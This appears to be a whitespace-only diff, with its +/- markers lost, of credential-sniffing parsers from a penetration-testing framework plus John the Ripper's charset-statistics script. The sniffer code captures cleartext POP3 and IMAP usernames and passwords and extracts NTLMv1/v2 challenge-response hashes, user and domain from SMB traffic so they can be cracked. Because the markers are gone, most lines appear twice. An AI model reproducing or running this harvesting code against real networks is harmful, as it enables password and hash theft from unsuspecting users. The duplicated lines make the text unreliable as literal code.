print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :login_bad
report_auth_info(s.merge({:active => false}))
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
when :login_bad
report_auth_info(s.merge({:active => false}))
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :login
s[:user]=$1
s[:pass]=$2
when :login
s[:user]=$1
s[:pass]=$2
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end

136
data/exploits/psnuffle/pop3.rb
View File

@ -6,83 +6,83 @@
# as unsuccessful logins... (Typos are common :-) )
#
class SnifferPOP3 < BaseProtocolParser
def register_sigs
self.sigs = {
:ok => /^(\+OK[^\n]*)\n/i,
:err => /^(\-ERR[^\n]*)\n/i,
:user => /^USER\s+([^\n]+)\n/i,
:pass => /^PASS\s+([^\n]+)\n/i,
:quit => /^(QUIT\s*[^\n]*)\n/i
}
end
def register_sigs
self.sigs = {
:ok => /^(\+OK[^\n]*)\n/i,
:err => /^(\-ERR[^\n]*)\n/i,
:user => /^USER\s+([^\n]+)\n/i,
:pass => /^PASS\s+([^\n]+)\n/i,
:quit => /^(QUIT\s*[^\n]*)\n/i
}
end
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
case matched
when :ok
# Last command was successful, in addition most servers transmit a banner with the first +OK
case s[:last]
when nil
# Its the first +OK must include the banner, worst case its just +OK
s[:info] = matches
s[:proto] = "tcp"
s[:name] = "pop3"
report_service(s)
case matched
when :ok
# Last command was successful, in addition most servers transmit a banner with the first +OK
case s[:last]
when nil
# Its the first +OK must include the banner, worst case its just +OK
s[:info] = matches
s[:proto] = "tcp"
s[:name] = "pop3"
report_service(s)
when :user
# When the last command was a username login
# We might keep track on this one in future
when :pass
# Perfect we get an +OK after a PASS command this means right password given :-)
when :user
# When the last command was a username login
# We might keep track on this one in future
when :pass
# Perfect we get an +OK after a PASS command this means right password given :-)
s[:proto] = "tcp"
s[:name] = "pop3"
s[:extra] = "Successful Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:proto] = "tcp"
s[:name] = "pop3"
s[:extra] = "Successful Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :quit
# The session is terminated by the user just delete is as well
sessions.delete(s[:session])
end
s[:last]=:ok
when :quit
# The session is terminated by the user just delete is as well
sessions.delete(s[:session])
end
s[:last]=:ok
when :err
case s[:last]
when :pass
# Oops got a -ERR after a pass so its crap ignore the pass
# But report it, might be helpfull for guessing :-)
when :err
case s[:last]
when :pass
# Oops got a -ERR after a pass so its crap ignore the pass
# But report it, might be helpfull for guessing :-)
s[:proto]="pop3"
s[:extra]="Failed Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:pass]=""
end
when nil
# No matches, no saved state
else
s[:last]=matched
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
s[:proto]="pop3"
s[:extra]="Failed Login. Banner: #{s[:banner]}"
report_auth_info(s)
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
s[:pass]=""
end
when nil
# No matches, no saved state
else
s[:last]=matched
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end

354
data/exploits/psnuffle/smb.rb
View File

@ -6,206 +6,206 @@
#Memo :
#FOR SMBV1
# Authentification without extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
# Authentification without extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
# Authentification with extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
# Authentification with extended security set
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
#FOR SMBV2
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
class SnifferSMB < BaseProtocolParser
def register_sigs
self.sigs = {
:smb1_negotiate => /\xffSMB\x72/n,
:smb1_setupandx => /\xffSMB\x73/n,
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
}
end
def register_sigs
self.sigs = {
:smb1_negotiate => /\xffSMB\x72/n,
:smb1_setupandx => /\xffSMB\x73/n,
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
}
end
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
case matched
when :smb1_negotiate
payload = pkt.payload.dup
wordcount = payload[36,1].unpack("C")[0]
#negotiate response
if wordcount == 17
flags2 = payload[14,2].unpack("v")[0]
#the server challenge is here
if flags2 & 0x800 == 0
s[:challenge] = payload[73,8].unpack("H*")[0]
s[:last] = :smb1_negotiate
end
end
case matched
when :smb1_negotiate
payload = pkt.payload.dup
wordcount = payload[36,1].unpack("C")[0]
#negotiate response
if wordcount == 17
flags2 = payload[14,2].unpack("v")[0]
#the server challenge is here
if flags2 & 0x800 == 0
s[:challenge] = payload[73,8].unpack("H*")[0]
s[:last] = :smb1_negotiate
end
end
when :smb1_setupandx
s[:smb_version] = "SMBv1"
parse_sessionsetup(pkt, s)
when :smb2_setupandx
s[:smb_version] = "SMBv2"
parse_sessionsetup(pkt, s)
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
when :smb1_setupandx
s[:smb_version] = "SMBv1"
parse_sessionsetup(pkt, s)
when :smb2_setupandx
s[:smb_version] = "SMBv2"
parse_sessionsetup(pkt, s)
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end # end of each_key
end # end of parse
#ntlmv1, ntlmv2 or ntlm2_session
def detect_ntlm_ver(lmhash, ntlmhash)
return "NTLMv2" if ntlmhash.length > 48
if lmhash.length == 48 and ntlmhash.length == 48
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
return "NTLM2_SESSION"
else
return "NTLMv1"
end
else
raise RuntimeError, "Unknow hash type"
end
end
#ntlmv1, ntlmv2 or ntlm2_session
def detect_ntlm_ver(lmhash, ntlmhash)
return "NTLMv2" if ntlmhash.length > 48
if lmhash.length == 48 and ntlmhash.length == 48
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
return "NTLM2_SESSION"
else
return "NTLMv1"
end
else
raise RuntimeError, "Unknow hash type"
end
end
def parse_sessionsetup(pkt, s)
payload = pkt.payload.dup
ntlmpayload = payload[/NTLMSSP\x00.*/m]
if ntlmpayload
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
case ntlmmessagetype
when 2 # challenge
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
s[:last] = :ntlm_type2
when 3 # auth
if s[:last] == :ntlm_type2
lmlength = ntlmpayload[12, 2].unpack("v")[0]
lmoffset = ntlmpayload[16, 2].unpack("v")[0]
ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
domainlength = ntlmpayload[28, 2].unpack("v")[0]
domainoffset = ntlmpayload[32, 2].unpack("v")[0]
usrlength = ntlmpayload[36, 2].unpack("v")[0]
usroffset = ntlmpayload[40, 2].unpack("v")[0]
def parse_sessionsetup(pkt, s)
payload = pkt.payload.dup
ntlmpayload = payload[/NTLMSSP\x00.*/m]
if ntlmpayload
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
case ntlmmessagetype
when 2 # challenge
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
s[:last] = :ntlm_type2
when 3 # auth
if s[:last] == :ntlm_type2
lmlength = ntlmpayload[12, 2].unpack("v")[0]
lmoffset = ntlmpayload[16, 2].unpack("v")[0]
ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
domainlength = ntlmpayload[28, 2].unpack("v")[0]
domainoffset = ntlmpayload[32, 2].unpack("v")[0]
usrlength = ntlmpayload[36, 2].unpack("v")[0]
usroffset = ntlmpayload[40, 2].unpack("v")[0]
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
secbloblength = payload[51,2].unpack("v")[0]
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:peer_os] = names[0] || ''
s[:peer_lm] = names[1] || ''
s[:last] = :ntlm_type3
end
end
else
wordcount = payload[36,1].unpack("C")[0]
#authentification without smb extended security (smbmount, msf server capture)
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
lmlength = payload[51,2].unpack("v")[0]
ntlmlength = payload[53,2].unpack("v")[0]
s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
secbloblength = payload[51,2].unpack("v")[0]
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:peer_os] = names[0] || ''
s[:peer_lm] = names[1] || ''
s[:last] = :ntlm_type3
end
end
else
wordcount = payload[36,1].unpack("C")[0]
#authentification without smb extended security (smbmount, msf server capture)
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
lmlength = payload[51,2].unpack("v")[0]
ntlmlength = payload[53,2].unpack("v")[0]
s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
s[:user] = names[0]
s[:domain] = names[1]
s[:peer_os] = names[2]
s[:peer_lm] = names[3]
s[:last] = :smb_no_ntlm
else
#answer from server
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
#do not output anonymous/guest logging
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
#set lmhash to a default value if not provided
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
s[:user] = names[0]
s[:domain] = names[1]
s[:peer_os] = names[2]
s[:peer_lm] = names[3]
s[:last] = :smb_no_ntlm
else
#answer from server
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
#do not output anonymous/guest logging
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
#set lmhash to a default value if not provided
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
smb_status = payload[9,4].unpack("V")[0]
if smb_status == 0 # success
smb_status = payload[9,4].unpack("V")[0]
if smb_status == 0 # success
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
logmessage =
"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
"SERVER CHALLENGE:#{s[:challenge]} " +
"\nLMHASH:#{s[:lmhash]} " +
"\nNTHASH:#{s[:ntlmhash]}\n"
print_status(logmessage)
logmessage =
"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
"SERVER CHALLENGE:#{s[:challenge]} " +
"\nLMHASH:#{s[:lmhash]} " +
"\nNTHASH:#{s[:ntlmhash]}\n"
print_status(logmessage)
src_ip = s[:client_host]
dst_ip = s[:host]
# know this is ugly , last code added :-/
smb_db_type_hash = case ntlm_ver
when "NTLMv1" then "smb_netv1_hash"
when "NTLM2_SESSION" then "smb_netv1_hash"
when "NTLMv2" then "smb_netv2_hash"
end
# DB reporting
report_auth_info(
:host => dst_ip,
:port => 445,
:sname => 'smb',
:user => s[:user],
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
:type => smb_db_type_hash,
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
:active => true
)
src_ip = s[:client_host]
dst_ip = s[:host]
# know this is ugly , last code added :-/
smb_db_type_hash = case ntlm_ver
when "NTLMv1" then "smb_netv1_hash"
when "NTLM2_SESSION" then "smb_netv1_hash"
when "NTLMv2" then "smb_netv2_hash"
end
# DB reporting
report_auth_info(
:host => dst_ip,
:port => 445,
:sname => 'smb',
:user => s[:user],
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
:type => smb_db_type_hash,
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
:active => true
)
report_note(
:host => src_ip,
:type => "smb_peer_os",
:data => s[:peer_os]
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_os",
:data => s[:peer_os]
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_lm",
:data => s[:peer_lm]
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_lm",
:data => s[:peer_lm]
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_domain",
:data => s[:domain]
) if (s[:domain] and s[:domain].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_domain",
:data => s[:domain]
) if (s[:domain] and s[:domain].strip.length > 0)
end
end
end
s[:last] = nil
sessions.delete(s[:session])
end
end
end
end
end
end
s[:last] = nil
sessions.delete(s[:session])
end
end
end
end

66
data/exploits/psnuffle/url.rb
View File

@ -6,43 +6,43 @@
# Sniffer class for GET URL's
class SnifferURL < BaseProtocolParser
def register_sigs
self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i,
}
end
def register_sigs
self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i,
}
end
def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k|
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
sessions[s[:session]].merge!({k => matches})
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
sessions[s[:session]].merge!({k => matches})
end
case matched
when :webhost
sessions[s[:session]].merge!({k => matches})
if(s[:get])
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session])
return
end
when nil
# No matches, no saved state
end # end case matched
end # end of each_key
end # end of parse
case matched
when :webhost
sessions[s[:session]].merge!({k => matches})
if(s[:get])
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session])
return
end
when nil
# No matches, no saved state
end # end case matched
end # end of each_key
end # end of parse
end # end of URL sniffer

96
data/john/run.linux.x64.mmx/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

96
data/john/run.linux.x86.any/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
@ -24,55 +24,55 @@ ch_num = '0123456789'
ch_sp = '!@#$+=.*'
opts = GetoptLong.new(
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
)
charset = nil
filename = "stats_out"
opts.each do |opt, arg|
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
case opt
when '--help'
help
when '--file'
filename = arg
when '--num'
charset = ch_num
when '--alpha'
charset = ch_alpha
when '--alphamaj'
charset = ch_alpha.capitalize
when '--alphanum'
charset = ch_alpha + ch_num
when '--alphanummaj'
charset = ch_alpha.capitalize + ch_num
when '--all'
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
when '--custom'
charset = arg
end
end
if charset == nil
help
help
end
fstat = File.open(filename, "w")
charset.each_byte do |c|
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
fstat.write("1=proba1[#{c.to_s}]\n")
charset.each_byte do |tmp|
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
end
end
fstat.close

96
data/john/run.linux.x86.mmx/genincstats.rb
View File

@ -3,20 +3,20 @@
require 'getoptlong'
def help
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
puts "Usage: #{$0} [options]"
puts "\t-h --help\t\tthis help."
puts "\t-f --file\t\toutput file."
puts "\t-n --num\t\tcharset: 0123456789"
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
puts "\t-l --alphanum\t\tcharset: alpha + num"
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
puts "\t-c --custom"
puts "\nExample:\n"
puts "#{$0} -f stats -s"
puts "#{$0} -f stats -c \"0123abc+=\""
exit
end
